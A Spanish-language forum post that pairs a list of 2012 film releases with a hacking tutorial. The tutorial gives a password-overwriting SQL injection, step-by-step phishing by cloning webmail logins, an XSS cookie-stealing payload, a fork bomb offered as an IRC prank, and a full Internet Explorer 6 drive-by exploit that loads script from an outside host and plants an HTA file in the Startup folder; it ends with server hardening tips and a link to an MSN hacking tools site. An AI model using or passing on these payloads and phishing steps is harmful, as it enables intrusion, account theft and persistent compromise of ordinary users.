blademasterpyre
Usuario (Perú)
ESTRENOS 2012 Películas estrenos del 27 de enero al 2 de febrero de 2012 J Edgar ( 2 febrero 2012 ) Los Descendientes ( 2 febrero 2012 ) Albert Nobbs ( 2 febrero 2012 ) Underworld 4 ( 2 febrero 2012 ) Bajo amenaza ( 2 febrero 2012 ) El monje ( 2 febrero 2012 ) Películas estrenos del 20 al 26 de Enero de 2012 Oro Negro[/color] ( 20 enero 2012 ) Jack y su gemela ( 20 enero 2012 ) Bunraku ( 20 enero 2012 ) Silencio en la nieve ( 20 enero 2012 ) Almanya[/color] ( 20 enero 2012 ) Películas estrenos del 13 al 19 de Enero de 2012 Los hombres que no amaban a las mujeres ( 13 enero 2012 ) La chispa de la vida ( 13 enero 2012 ) Juan de los Muertos ( 13 enero 2012 ) La Hora Más Oscura ( 13 enero 2012 ) The Collector[/color] ( 13 enero 2012 ) Películas estrenos del 5 al 12 de Enero de 2012 Sherlock Holmes 2 ( 5 enero 2012 ) La Dama de Hierro ( 5 enero 2012 ) Atraco por Duplicado ( 5 enero 2012 ) Una boda de muerte ( 5 enero 2012 ) Si quiero silbar, silbo ( 5 enero 2012 ) The Yellow Sea ( 5 enero 2012 ) The French Kissers ( 5 enero 2012 ) Películas y estrenos de 2012 Sin City 3 ( estreno en 2012 ) Los pájaros ( estreno en 2012 ) Sin City 2 ( estreno en 2012 ) John Carter ( estreno en 2012 ) Gangland ( estreno en 2012 ) Uncharted ( estreno en 2012 ) The Days Before ( estreno en 2012 ) Independence Day 2 ( estreno en 2012 ) Amanecer 2 ( estreno en 2012 ) Furia de Titanes 2 ( estreno en 2012 ) Skyfall ( estreno en 2012 ) Spiderman 4 ( estreno en 2012 ) Halo ( estreno en 2012 ) Terminator 5 ( estreno en 2012 ) Prometheus( estreno en 2012 ) Cenicienta ( estreno en 2012 ) Vida de Pi ( estreno en 2012 ) Men in Black 3 ( estreno en 2012 ) Dan Dare ( estreno en 2012 ) Titanic( estreno en 2012 ) Magneto ( estreno en 2012 ) Mob Girl ( estreno en 2012 ) Tron 3 ( estreno en 2012 ) Indomable ( estreno en 2012 ) Spider Woman ( estreno en 2012 ) El Símbolo Perdido ( estreno en 2012 ) El Hobbit: Un viaje inesperado ( estreno en 2012 ) Mad Max 4 ( estreno en 2012 ) GI Joe 2 ( estreno en 2012 ) Expediente X 3 ( estreno en 2012 ) Los Vengadores ( estreno en 2012 ) The Last Witch Hunter ( estreno en 2012 ) All Quiet on the Western Front ( estreno en 2012 ) Google Movie ( estreno en 2012 ) Los Diarios de Carrie ( estreno en 2012 ) 360 ( estreno en 2012 ) La Leyenda de Caín ( estreno en 2012 ) Scary Movie 5 ( estreno en 2012 ) 47 Ronin ( estreno en 2012 ) Red Tails ( estreno en 2012 ) Ghost in the Shell ( estreno en 2012 ) Call of Duty ( estreno en 2012 ) Gershwin ( estreno en 2012 ) Esperando a Robert Capa ( estreno en 2012 ) An american girl ( estreno en 2012 ) Ant Man ( estreno en 2012 ) Indiana Jones 5 ( estreno en 2012 ) Cazafantasmas 3 ( estreno en 2012 ) El motorista fantasma 2 ( estreno en 2012 ) Paper Wings ( estreno en 2012 ) Venom ( estreno en 2012 ) Quién engañó a Roger Rabbit 2 ( estreno en 2012 ) Doctor Sleep ( estreno en 2012 ) Lobezno 2 ( estreno en 2012 ) Youngblood ( estreno en 2012 ) Flash Gordon ( estreno en 2012 ) Stoker ( estreno en 2012 ) Alita ( estreno en 2012 ) Tomb ( estreno en 2012 ) Poltergeist ( estreno en 2012 ) Vlad ( estreno en 2012 ) Dark Void ( estreno en 2012 ) Albert Nobbs ( estreno en 2012 ) El hombre que mató a Don Quijote ( estreno en 2012 ) Batman 3 ( estreno en 2012 ) XxX 3 ( estreno en 2012 ) La reencarnación de Peter Proud ( estreno en 2012 ) Star Trek 2 ( estreno en 2012 ) Mantequilla ( estreno en 2012 ) The Numbers Station ( estreno en 2012 ) This Is Forty ( estreno en 2012 ) Olivia Twisted ( estreno en 2012 ) Dead Man Down ( estreno en 2012 ) Bruce contra Frankenstein ( estreno en 2012 ) Columbus Circle ( estreno en 2012 ) Monopoly ( estreno en 2012 ) Gengis Kan ( estreno en 2012 ) Grease ( estreno en 2012 ) Skinny Dip ( estreno en 2012 ) Crash Site ( estreno en 2012 ) Mulan ( estreno en 2012 ) Commando ( estreno en 2012 ) Tarántula ( estreno en 2012 ) Jóvenes Policías ( estreno en 2012 ) Vikings ( estreno en 2012 ) El Retorno del Capitán Nemo ( estreno en 2012 ) Bad Ass ( estreno en 2012 ) Leonardo da Vinci and the Soldiers of Forever ( estreno en 2012 ) Criminal Empire for Dummys ( estreno en 2012 ) Robert Kennedy ( estreno en 2012 ) El Protegido 2 ( estreno en 2012 ) American Pie ( estreno en 2012 ) Ronin ( estreno en 2012 ) Neon Genesis Evangelion ( estreno en 2012 ) La Isla del Tesoro ( estreno en 2012 ) The Machine ( estreno en 2012 ) Napoleón y Betsy ( estreno en 2012 ) Kick-Ass 2 ( estreno en 2012 ) Battleship ( estreno en 2012 ) Dark Life ( estreno en 2012 ) My American Lover ( estreno en 2012 ) Hyde Park on Hudson ( estreno en 2012 ) The Last Beat ( estreno en 2012 ) La Búsqueda 3 ( estreno en 2012 ) La recluta Benjamin ( estreno en 2012 ) Dime con cuántos ( estreno en 2012 ) Grandes Esperanzas ( estreno en 2012 ) The Casebook of Victor Frankenstein ( estreno en 2012 ) Mortadelo y Filemón 3 ( estreno en 2012 ) Promesas del Este 2 ( estreno en 2012 ) Alfred Hitchcock and the Making of Psycho ( estreno en 2012 ) Magic Mike ( estreno en 2012 ) Black Rock ( estreno en 2012 ) Hit Somebody ( estreno en 2012 ) Odd Thomas ( estreno en 2012 ) Headshot ( estreno en 2012 ) Perfect Sense ( estreno en 2012 ) Thanks for sharing ( estreno en 2012 ) Over the Wall ( estreno en 2012 ) Goats ( estreno en 2012 ) Ice Age 4 ( estreno en 2012 ) Adiós mi Reina ( estreno en 2012 ) The Flowers of War ( estreno en 2012 ) Knife Fight ( estreno en 2012 ) Rock of Ages ( estreno en 2012 ) Gone ( estreno en 2012 ) El último viaje del Demeter ( estreno en 2012 ) Dogs of Babel ( estreno en 2012 ) Very Good Girls ( estreno en 2012 ) Gimme Shelter ( estreno en 2012 ) Fun Size ( estreno en 2012 ) The wrong picture ( estreno en 2012 ) Sin Salida 2 ( estreno en 2012 ) Into the Beautiful ( estreno en 2012 ) Los Tres Chiflados ( estreno en 2012 ) Snitch ( estreno en 2012 ) El Samaritano ( estreno en 2012 ) Segundos de Placer ( estreno en 2012 ) The Home ( estreno en 2012 ) Dictablanda ( estreno en 2012 ) Blackbird ( estreno en 2012 ) Sexy Evil Genius ( estreno en 2012 ) Under the Skin ( estreno en 2012 ) The Applicant ( estreno en 2012 ) Cogans Trade ( estreno en 2012 ) The Devil in the White City ( estreno en 2012 ) La Cena de los Acusados ( estreno en 2012 ) Weapon ( estreno en 2012 ) Friends With Kids ( estreno en 2012 ) Black Hats ( estreno en 2012 ) Now You See Me ( estreno en 2012 ) Contraband ( estreno en 2012 ) The Iceman ( estreno en 2012 ) The Bricklayer ( estreno en 2012 ) Afterburn ( estreno en 2012 ) Buffy Cazavampiros ( estreno en 2012 ) Broken Run ( estreno en 2012 ) Infinitely Polar Bear ( estreno en 2012 ) Now Is Good ( estreno en 2012 ) El Despertar de los Muertos ( estreno en 2012 ) Medallion ( estreno en 2012 ) Edén ( estreno en 2012 ) What to Expect ( estreno en 2012 ) Step Up 4 ( estreno en 2012 ) Southpaw ( estreno en 2012 ) Matanza en Texas 3D ( estreno en 2012 ) The Company You Keep ( estreno en 2012 ) The Wettest County ( estreno en 2012 ) Instrumentos Mortales ( estreno en 2012 ) Straight As ( estreno en 2012 ) One for the Money ( estreno en 2012 ) Abraham Lincoln: Cazador de Vampiros ( estreno en 2012 ) Underworld 4 ( estreno en 2012 ) Lock Out ( estreno en 2012 ) Deep Blue Sea ( estreno en 2012 ) Las Montañas de la Locura ( estreno en 2012 ) Riddick 3 ( estreno en 2012 ) Pancho Villa ( estreno en 2012 ) Drácula, el no muerto ( estreno en 2012 ) Space Invaders ( estreno en 2012 ) World War Z ( estreno en 2012 ) World War X ( estreno en 2012 ) Marco Polo ( estreno en 2012 ) Guns Girls and Gambling ( estreno en 2012 ) El Invitado ( estreno en 2012 ) Karate Kid 2 ( estreno en 2012 ) State of the Union ( estreno en 2012 ) Blancanieves y la leyenda del cazador ( estreno en 2012 ) Premium Rush ( estreno en 2012 ) Carne de neón ( estreno en 2012 ) Némesis ( estreno en 2012 ) Lincoln ( estreno en 2012 ) The Big Bang ( estreno en 2012 ) Viuda Negra ( estreno en 2012 ) Angry Birds ( estreno en 2012 ) Fantastic Voyage 3D ( estreno en 2012 ) Los 4 fantásticos ( estreno en 2012 ) Sexo en Nueva York 3 ( estreno en 2012 ) Venganza 2 ( estreno en 2012 ) Up and Away ( estreno en 2012 ) Last Man Standing ( estreno en 2012 ) Consent to Kill ( estreno en 2012 ) Max Steel ( estreno en 2012 ) ATM ( estreno en 2012 ) Cloud Atlas ( estreno en 2012 ) The Normal Heart ( estreno en 2012 ) Tarzán ( estreno en 2012 ) La Liga de La Justicia ( estreno en 2012 ) Mass Effect ( estreno en 2012 ) Nina Simone ( estreno en 2012 ) The Age of Adaline ( estreno en 2012 ) 300: Batalla de Artemisa ( estreno en 2012 ) Cancún ( estreno en 2012 ) Supergirl ( estreno en 2012 ) Vision Quest ( estreno en 2012 ) Metal Gear Solid ( estreno en 2012 ) Juez Dredd ( estreno en 2012 ) Parque Jurásico 4 ( estreno en 2012 ) Maléfica ( estreno en 2012 ) Protection ( estreno en 2012 ) The Croods ( estreno en 2012 ) Noche en el Museo 3 ( estreno en 2012 ) Dracula Year Zero ( estreno en 2012 ) Rec Apocalipsis ( estreno en 2012 ) Mortal Kombat ( estreno en 2012 ) Stretch Armstrong ( estreno en 2012 ) Daredevil ( estreno en 2012 ) Luces Rojas ( estreno en 2012 ) The Crossing ( estreno en 2012 ) Maria Callas ( estreno en 2012 ) Hostel 3 ( estreno en 2012 ) El Aprendiz del Espectro ( estreno en 2012 ) Black Eyed Peas ( estreno en 2012 ) Iron Fist ( estreno en 2012 ) Dr. Strange ( estreno en 2012 ) The Grey ( estreno en 2012 ) John Belushi ( estreno en 2012 ) Bugs Bunny ( estreno en 2012 ) Cleopatra ( estreno en 2012 ) Ion ( estreno en 2012 ) The Insiders ( estreno en 2012 ) Cosmopolis ( estreno en 2012 ) Los Mercenarios 2 ( estreno en 2012 ) WET ( estreno en 2012 ) X-MEN Orígenes: Mística ( estreno en 2012 ) La pesca de salmón en Yemen ( estreno en 2012 ) Alibi ( estreno en 2012 ) Pitch Perfect ( estreno en 2012 ) El Dictador ( estreno en 2012 ) Red Dead Redemption ( estreno en 2012 ) Selma ( estreno en 2012 ) Save the Date ( estreno en 2012 ) Tall Man ( estreno en 2012 ) The homelanders ( estreno en 2012 ) Arbitrage ( estreno en 2012 ) The Boom Boom Room ( estreno en 2012 ) Siberian Education ( estreno en 2012 ) The Cabin in the Woods ( estreno en 2012 ) LOL Laughing Out Loud ( estreno en 2012 ) Desafío Total ( estreno en 2012 ) Cherry ( estreno en 2012 ) Lunatic at Large ( estreno en 2012 ) Bait and Switch ( estreno en 2012 ) Romeo y Julieta ( estreno en 2012 ) All You Need Is Kill ( estreno en 2012 ) Excalibur ( estreno en 2012 ) Crossed ( estreno en 2012 ) Syrup ( estreno en 2012 ) Cristiada ( estreno en 2012 ) The Words ( estreno en 2012 ) Los Juegos del Hambre ( estreno en 2012 ) Nurse 3D ( estreno en 2012 ) Twixt ( estreno en 2012 ) The Divide ( estreno en 2012 ) Black Water ( estreno en 2012 ) Marriage Counselor ( estreno en 2012 ) Frankenweenie ( estreno en 2012 ) The Lorax ( estreno en 2012 ) The Innkeepers ( estreno en 2012 ) Cities ( estreno en 2012 ) Wanderlust ( estreno en 2012 ) La Torre Oscura ( estreno en 2012 ) Tomb Raider 3 ( estreno en 2012 ) Incarceron ( estreno en 2012 ) Heavy Metal ( estreno en 2012 ) Wish List ( estreno en 2012 ) Gambit ( estreno en 2012 ) Lamb of God ( estreno en 2012 ) Triple frontera ( estreno en 2012 ) Alex Cross ( estreno en 2012 ) Gen 13 ( estreno en 2012 ) La extraña vida de Timothy Green ( estreno en 2012 ) Godzilla ( estreno en 2012 ) Sgt. Rock ( estreno en 2012 ) El Cuervo de Edgar Allan Poe ( estreno en 2012 ) Shunt ( estreno en 2012 ) Slide ( estreno en 2012 ) True Blood ( estreno en 2012 ) Por 13 razones ( estreno en 2012 ) Girls Night Out ( estreno en 2012 ) Freddie Mercury ( estreno en 2012 ) The Maze Runner ( estreno en 2012 ) Back Roads ( estreno en 2012 ) Salvajes ( estreno en 2012 ) Innocence ( estreno en 2012 ) Viaje al Centro de la Tierra 2 ( estreno en 2012 ) Linda Lovelace ( estreno en 2012 ) Al Borde del Abismo ( estreno en 2012 ) Stag ( estreno en 2012 ) Madagascar 3 ( estreno en 2012 ) Esto es la Guerra ( estreno en 2012 ) Coriolanus ( estreno en 2012 ) El Llanero Solitario ( estreno en 2012 ) Butterfly ( estreno en 2012 ) Salt 2 ( estreno en 2012 ) Low Life ( estreno en 2012 ) Transit ( estreno en 2012 ) Monster Witness Relocation Program ( estreno en 2012 ) Welcome to People ( estreno en 2012 ) Mavericks ( estreno en 2012 ) Forgotten ( estreno en 2012 ) Horns ( estreno en 2012 ) The Ring 3 ( estreno en 2012 ) Married and Cheating ( estreno en 2012 ) Peter Pan Begins ( estreno en 2012 ) The Shadow ( estreno en 2012 ) Desperados ( estreno en 2012 ) Resident Evil 5 ( estreno en 2012 ) The Amateur Photographer ( estreno en 2012 ) Echelon ( estreno en 2012 ) La Primera Vez ( estreno en 2012 ) The East ( estreno en 2012 ) Elizabeth Taylor ( estreno en 2012 ) Ted ( estreno en 2012 ) Argo ( estreno en 2012 ) Freaky Deaky ( estreno en 2012 ) Elvis y Nixon ( estreno en 2012 ) Hotel Transylvania ( estreno en 2012 ) Filth ( estreno en 2012 ) The Brass Teapot ( estreno en 2012 ) Timeless ( estreno en 2012 ) Verano en Febrero ( estreno en 2012 ) Static ( estreno en 2012 ) RIPD ( estreno en 2012 ) Inside the Mind of Charles Swan ( estreno en 2012 ) Darling Companion ( estreno en 2012 ) Buscando Justicia ( estreno en 2012 ) Bloodwork ( estreno en 2012 ) August: Osage County ( estreno en 2012 ) WE ( estreno en 2012 ) Movie 43 ( estreno en 2012 ) Imogene ( estreno en 2012 ) Into the White ( estreno en 2012 ) Being Flynn ( estreno en 2012 ) Loosies ( estreno en 2012 ) The Five-Year Engagement ( estreno en 2012 ) The Follower ( estreno en 2012 ) El gran Gatsby ( estreno en 2012 ) Acto de Valor ( estreno en 2012 ) Safe ( estreno en 2012 ) Paranormal Activity 4 ( estreno en 2012 ) The Man with the Iron Fists ( estreno en 2012 ) Upside Down ( estreno en 2012 ) Silent House ( estreno en 2012 ) Dog Fight ( estreno en 2012 ) The Devil Inside ( estreno en 2012 ) Masters del Universo ( estreno en 2012 ) The Paperboy ( estreno en 2012 ) Powers ( estreno en 2012 ) Web Cam ( estreno en 2012 ) Falling Slowly ( estreno en 2012 ) Warm Bodies ( estreno en 2012 ) Brave ( estreno en 2012 ) Magic Magic ( estreno en 2012 ) Django Unchained ( estreno en 2012 ) Secret Door ( estreno en 2012 ) The Gangster Squad ( estreno en 2012 ) Good Deeds ( estreno en 2012 ) The Stare ( estreno en 2012 ) American Pie: El Reencuentro ( estreno en 2012 ) Los Inmortales ( estreno en 2012 ) La Bella y la Bestia (1991) ( estreno en 2012 ) La Mujer de Negro ( estreno en 2012 ) Broken ( estreno en 2012 ) Lonely Hunter ( estreno en 2012 ) Napa ( estreno en 2012 ) Anything but Ordinary ( estreno en 2012 ) Cottage Country ( estreno en 2012 ) Extremely Loud and Incredibly Close ( estreno en 2012 ) Phantom ( estreno en 2012 ) Long Time Gone ( estreno en 2012 ) Brilliant ( estreno en 2012 ) John Dies at the End ( estreno en 2012 ) Spinning Gold ( estreno en 2012 ) Parker ( estreno en 2012 ) Mama ( estreno en 2012 ) The Longest Week ( estreno en 2012 ) Fire with Fire ( estreno en 2012 ) Todos los Días de mi Vida ( estreno en 2012 ) Joyful Noise ( estreno en 2012 ) PORDAVOR SI PODRIAN DEJARME PUNTOS SOY NUEVO Y COMENTE
Tecnicas de Hackeo de Sitios Web Ahora bien, quizás estas leyendo esto porque quieres hacerte una idea de cómo se hackea un sitio. Existen varios niveles y técnicas de hackeo: Change Coding Este tipo de hackeo es muy divertido y, la mayoría de las veces, inocuo. Se trata simplemente de modificar el código que despliega una página de Internet agregando órdenes en javascript o VB Script desde la barra URL del navegador. Incluso la elemental página de Google ha sufrido este tipo de hacking. SQL Injection Como habrás notado, muchos sitios en la red muestran una caja de "Buscar" o "Search". En SQL el punto y coma ( funcionan como el fin de comando y el doble guión (--) como comentario. Si sabes el nombre de la tabla (o intentas adivinarlo) donde se guardan los passwords de los usuarios puedes jugar un poco enviando cosas como: UPDATE users SET password="hack"; este tipo de hackeo es muy entretenido (horas y horas de sana diversión ;-) ) y te sorprenderás del hecho de que incluso sitios de grandes empresas internacionales no poseen ningún sistema de filtrado. SQL Ruleezzz!!! Phising "password harvesting fishing" (cosecha y pesca de contraseñas) es una técninca que consiste en duplicar (hasta en el más mínimo detalle) un sitio web verdadero en nuestro propio servidor. Debemos ir a Hotmail, Gmail, Yahoo!, etcétera, ver el código HTML y guardarlo en nuestro propio server. Luego enviamos un email a la persona de la cual deseamos su clave con algo como "Alguien muy especial te ha enviado una Ciber-tarjeta, haz click aquí" y lo enviamos a nuestro propio Webserver en Linux. El usuario cree que está entrando en la página de inicio de Hotmail e introduce su login y password, ¡pero ahora es nuestro! Dictionary's attack Existen personas (y administradores de sistemas) que piensan que por usar palabras como "fanerogama"o "porfirogeneta" como password, nadie los podrá adivinar. Pero en realidad esas palabras existen en cualquier diccionario, y los diccionarios que sirven para revisar la ortografía en los procesadores de texto como AbiWord, también pueden ser usados para intentar logearse dentro de un sistema ajeno. Existen scripts que usan cada palabra de los diccionarios en español, inglés, francés, finlandés, turco, etc . para hacer un login. Estos scripts pueden tardarse mucho tiempo haste encontrar un password que corresponda a la palabra y cuando lo hacen, envian un email al hacker para avisarle cual palabra es un password. Los hackers que se consideran a sí mismos elegantes y creativos sienten aversión por este tipo de hackeo pues en el simplemente se aplica la fuerza bruta (y la paciencia). buffer overflow (o simplemente overflow). Los programas se almacenan en buffers (secciones contiguas de memoria), bajo ciertas circunstancias los datos que se envían al buffer sobrepasan su capacidad y la memoria se "desparrama", generalmente esto provoca que el programa colapse pero muchas veces, durante una pequeña fracción de segundo, la información enviada al buffer puede ejecutarse con los permisos del usuario dueño del proceso. El hacker (que debe conocer bien C y ensamblador) aprovecha esto, envía muchos datos al buffer, para desbordarlo y ejecutar código malicioso. Existen pocos hackers con el suficiente talento como para aprovechar un overflow recién descubierto, el problema es que luego de un par de semanas de conocido el exploit, comienzan a aparecer en la red scripts que automatizan el hackeo y todos los script kiddies comienzan a ejecutarlos. Solución: coloque un "apt-get -f -y dist-upgrade" en el cron y manténgase informado. A los errores en la programación se les conoce como "bugs" o bichos, la mayoría de los bugs sólo hacen que los programas no funcionen como deben pero algunos pueden ser aprovechdos para violar la seguridad, a estos bugs se les conoce como "exploits". Es decir, no todos los bugs son exploits pero todo exploit es un bug. Denegation of Service o DOS La denegación de un servicio implica que el hacker ha aprovechado un bug en un programa para " tirar" un servicio del servidor. Generalmente se trata del Webserver. El IIS de Microsoft es particularmente vulnerable a este tipo de ataques. Tanto el Change Coding como el DOS son hacks relativamente benévolos pues no implican (necesariamente) a un intruso en el sistema. Aplication level Esto ya es más serio, alguien se ha apropiado de una aplicacón del sistema. La mayoría de las veces se trata de una aplicación Web como PHP-Nuke o MyAdmin. Sin embargo en ocasiones el dominio de una aplicación conduce a tener más accesos y facilidades en el hackeo. Root hacking Este es el hack más grave, el hacker ha tomado el control del sistema y puede hacer lo que quiera con él. Generalmente el hacker tratará de pasar desapercibido y creára un usuario con todos los derechos para entrar cuando quiera al sistema y regodearse de lo poco hábil que es el administrador. Hay que considerar que muchas veces no existe una diferencia clara en estos niveles. Muchos hackeos al root empezaron siendo un simple juego de Cross Scripting con el cual el hacker obtuvo el password de PHPNuke, con lo cual se hizo con el password de Mysql y dado que era una versión no actualizada de Mysql, ejecutó un overflow con el que se hizo root. Si detectamos un root hacking lo primero es desconectar el equipo de la red, hacer un análisis forense de los paso del hacker, respaldar y formatear el disco duro incluyendo el MBR. Muchos administradores se sienten avergonzados y reinstalan el sistema rápidamente y sin decirle a nadie que ha sido hackeado. Esta es una actitud equivocada, sea humilde y reconozca que ha sido vencido en buena lid. Infórmele a sus colegas y hagan juntos el análisis de cómo fue que el intruso entró y como mejorar las políticas para que eso no vuelva a ocurrir. Un hacker puede enseñarle muchísimo sobre seguridad, aún cuando no hubiese tenido ninguna intención de ello. Cross Scripting, o XSS, es una técnica de hackeo que consiste en enviar información maliciosa a través del browser. En versiones anteriores de Internet Explorer era suficiente con colocar ?op=userinfo&uname=<script>alert(document.cookie);>/script> En el URL para ver la información de otros usuarios en un sitio de ventas por Internet. Generalmente todo ataque comienza con nmap, este es un programa de escaneo de puertos. El escaneo de puertos permite conocer que sistema operativo y que servicios posee un servidor de la red. Si no tiene nmap instálelo con apt-get. Algunas opciones de escaneo de nmap sólo pueden ejecutarse como root: # nmap -sS -sV -P0 www.algoaqui.com Lo que verá, luego de un minuto de espera, será la lista de los servicios y el programa que los ejecuta (Apache, Qmail, SSH, vsFTP, etcétera). ¿Cómo funciona nmap?, bueno, es como si arrojara piedritas a las ventanas de una casa para ver quién se asoma y cómo es. De la misma manera nmap envia miles de peticiones de distintos tipos (TCP/UDP) a todos los puertos del servidor esperando que alguien le conteste. Los programas creen que alguien los está llamando pero nmap no mantiene contacto: sólo quiere saber si hay alguien en esa ventana ;-). De esta manera muchas herramientas pensadas para detectar intrusos nunca se enteran que nmap estuvo husmeando por sus puertos. En la película Matrix se puede ver a Trinity usando Nmap para hackear un exploit de la versión 1 de SSH: Tenga cuidado, en Estados Unidos y varios países de Europa el escaneo de puertos es un delito y varias corporaciones se han tomado muy en serio seguirle la pista de los husmeadores y acusarlos con su proveedor de internet. De hecho, si usted frecuenta el sitio de nmap y sus listas de correo, seguramente su nombre ya está en alguna base de datos del FBI. Por supuesto, como muchas otras leyes, estas leyes son idiotas: sin gente escaneando puertos y tratando de entrar a los sistemas aún estaríamos usando Windows 3.11. El mundo tiene una deuda con los hackers que se niega a reconocer, sin ellos el comercio electrónico hubiese sido imposible. Si usted está en América Latina no se preocupe, nuestros legisladores ni siquiera saben (ni les interesa saber) qué es un escaneo de puertos. Una vez que sepas que programas se están ejecutando realiza una busqueda en google sobre algún exploit relacionado. En todos los programas, tarde o temprano, se descubre una vulnerabilidad, con suerte, el admistrador del servidor no ha actualizado en semanas o meses y tú puedes intentar entrar. Existen muchos scripts, sobre todo de Perl, que intentan hackear un sitio sólo ejecutándolos, hay mucha gente que no tiene idea de cómo funcionan estos scripts y simplemente los ejecutan hacia un servidor. Cada tres o cuatro días en mi log de Apache aparece alguien que corrió uno de esos scripts... ¡que eran para IIS! A estos soterutanos se les conoce como Script Kiddies y conforman un vergonzoso tipo de lamer. Si entras a un IRC preguntando sobre cómo aprender a hackear , algún inconsciente, por jugarte una broma, te dirá que hace poco él descubrió una forma de tirar el sitio de Microsoft y te pedirá que escribas en el shell: # nmap-O www.microsoft.com && : (){ : |:& };: ¡No lo hagas! tu sistema se congelará por falta de memoria y la única manera de "destrabarlo" será reiniciar todo el equipo con el botón de reset del CPU. Un hack que está de moda es un hoyo crítico de seguridad en el IE 6 de Windows XP, este hoyo está presente incluso si se tiene el Service Pack 2 y afecta tanto a la versión Home, como la "Professional" (Microsoft gastó cientos de millones en el SP2 pero al parecer de poco sirvió). Fijate en la siguiente página sp2rc.html: <OBJECT id="localpage" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1" value="command;file://C:WINDOWS---PCHealthHelpCtrSystemblurbstools.htm">---</OBJECT> <OBJECT id="inject" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7% style="position:absolute;top:140;left:72;z-index:100;" codebase="hhctrl.ocx#Version=5,2,3790,1194" width="7%"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Button" value="Text:Just a button"> <PARAM name="Window" value="$global_blank"> <PARAM name="Item1" value='command;javascript: execScript("document.write("<script language=\"vbscript\" src=\"http://www.mononeurona.org/writehta.txt\"" +String.fromCharCode(62)+" </scr"+"ipt"+String.fromCharCode(62))"'> </OBJECT> <script> localpage.HHClick(); setTimeout("inject.HHClick()",100); </script> El objeto id: localpage (que posee un formato de extensión de los archivos de ayuda de Windows) le dice a hhctrl.ocx que abrá una ventana de ayuda para C:WINDOWSPCHealthHelpCtrSystemblurbstools.htm (un archivo normal del sistema que está en todos los Windows XP). El segundo objecto id: inject llama al script hospedado en www.mononeurona.org/writehta.txt que inyecta el código remoto de este archivo, haciendo un XSS típico. El archivo writehta.txt contiene instrucciones maliciosas para crear un objeto ADODB.Connection: Dim Conn, rs Set Conn = CreateObject("ADODB.Connection" Conn.Open "Driver={Microsoft Text Driver (*.txt; *.csv)};" & _ "Dbq=http://www.mononeurona.org;" & _ "Extensions=asc,csv,tab,txt;" & _ "Persist Security Info=False" Dim sql sql = "SELECT * from foobar.txt" set rs = conn.execute(sql) set rs =CreateObject("ADODB.recordset" rs.Open "SELECT * from foobar.txt", conn rs.Save "Cocuments and SettingsAll UsersStart MenuProgramsStartup Microsoft Office.hta", adPersistXML rs.close conn.close window.close Este archivo es usado para ejecutar un query SQL: sql = "SELECT * from foobar.txt", donde foobar.txt es hospedado en el servidor FTP del atacante (el cual está configurado para permitir el acceso anónimo). El resultado del query se salva en el archivo Cocuments and SettingsAll UsersStart MenuProgramsStartupMicrosoft Office.hta. El objeto ADODB y el archivo foobar.txt también pueden ejecutarse colocándolos escondidos como si fuesen una imagen: <img id="dyn" src="malwarez6.mcb" border="0"> todos los antivirus están configurado para no escanear los archivos de imágenes de modo que podemos colarnos con facilidad al sistema. Practicamente no hay límites en lo que uno puede guardar en este archivo hta y además, como se guarda en el menú "All Users" se ejecuta cada vez que un usuario se logea en Windows XP. Por supuesto lo primero que una persona maliciosa haría sería buscar los números de tarjetas de crédito y los password de todo el sistema ¡Gracias Microsoft! Y todo esto lo hemos hecho sin que el usuario tuviese que recibir un email o apretar un botón, simplemente entrando a la página sp2rc.html. Miles de páginas en Internet tienen este código y si usted usa Internet Explorer 6 para navegar seguramente ya tiene el archivo hta en su disco pues los antivirus no lo detectan. Como digo, este código está muy de moda, y al parecer no habrá parche hasta finales del 2005. Los que usan [[http://www.mozilla.org/products/firefox/ Mozilla-Firefox]] en XP están a salvo, pues este código no les afecta ;-). De cualquier manera si se ve a obligado a usar Windows XP por la necesidad de usar CorelDraw o Autocad no navegue en este sistema operativo. Al terminar de usar ese programa, bootee a Linux (porque tiene Linux ¿verdad?) y desde ahí navegue, consulte su email y use Messenger. Si tú, como muchos de nosotros, tienes un servidor Linux en la red, estos son los consejos básicos de seguridad: 1. Instala lo mínimo indispensable Realiza un deborphan cada tanto, no instales samba en un equipo que tiene webserver. 2. Usa password alfanuméricos Mezcla números y letras como caktus90 o 8qwer9. No uses passwords de palabras que están en el diccionario. No uses un password del sistema para suscribirte a una lísta de correo o un foro. 3. No instales Telnet y FTP Prefiere SSH y un servidor FTP sobre SSL como vsFTP. No permitas accessos remotos del root por SSH. Permite un solo usuario en AllowUsers para evitar ataques de diccionario. Trata de encriptar todo lo que entre al sistema, incluyendo el correo. 4. Actualiza cada semana De preferencia realiza las actualizaciones de noche, si apt-get sugiere instalar un nuevo archivo de configuración en lugar del que estás usando prefiere el que trae el paquete, muchas veces el problema no es el programa sino la configuración. 5. No instales las X Un servidor no siquiera debería de tener monitor, todo debe hacerse a través de SSH. 6. Enjaula los demonios Corre apache, OpenSSH y la base datos de datos "enjaulados" en un chroot. 7. Watch Log Instala un reporteador de logs que te envie un reporte general del sistema cada tres días, hay mucha información útil en los logs que se pierde por no saber extraer la información. 8. No instales compiladores Si necesitas compilar un nuevo kernel, desinstala gcc y el paquete libc6-dev luego de bootear con el nuevo kernel. 9. Suscríbete a una lista de anuncios de seguridad Existen muchas, también puedes visitar sitios como [[http://www.cofradia.org/ La cofradía]] donde se anuncian bugs de seguridad y cómo corregirlos. 10. Nmap on myself Una forma de descubrir si un troyano ha abierto un backdoor es correr nmap contra nuestro propio servidor. Así te darás una idea de lo que un hacker (o cracker) vería si escanea tu servidor. 11. Apache mod_security No sé porque este magnífico módulo no viene por omisión pero practicamente todos los Cross Scripting quedan anulados con él. 12. MVC El model view controller no sólo sirve para separar el diseño de la programación sino que incrementa la seguridad. Si estas haciendo una aplicación web con python, php o perl crea una clase para la base de datos que guarde los valores, cierra la base de datos y después inserta los valores en el código XHTML. No hackeamos cuentas de hotmail.com, no preguntes como ser un hacker: instala Linux en tu equipo con el Webserver, programa en Perl y serás un hacker. yO se ke muchos no entenderan nada!! YAPA xd Programas para Hackear Todos los Programas para Hackear http://www.hack-msn.com/: Aquí en esta pagina web vas a enterarte acerca de los programas donde te permitirá hachear todos lo que tu quieras, como también sabrás de los nuevos parches multimsn y de las utilidades generación MSN live, así mismo también contaras 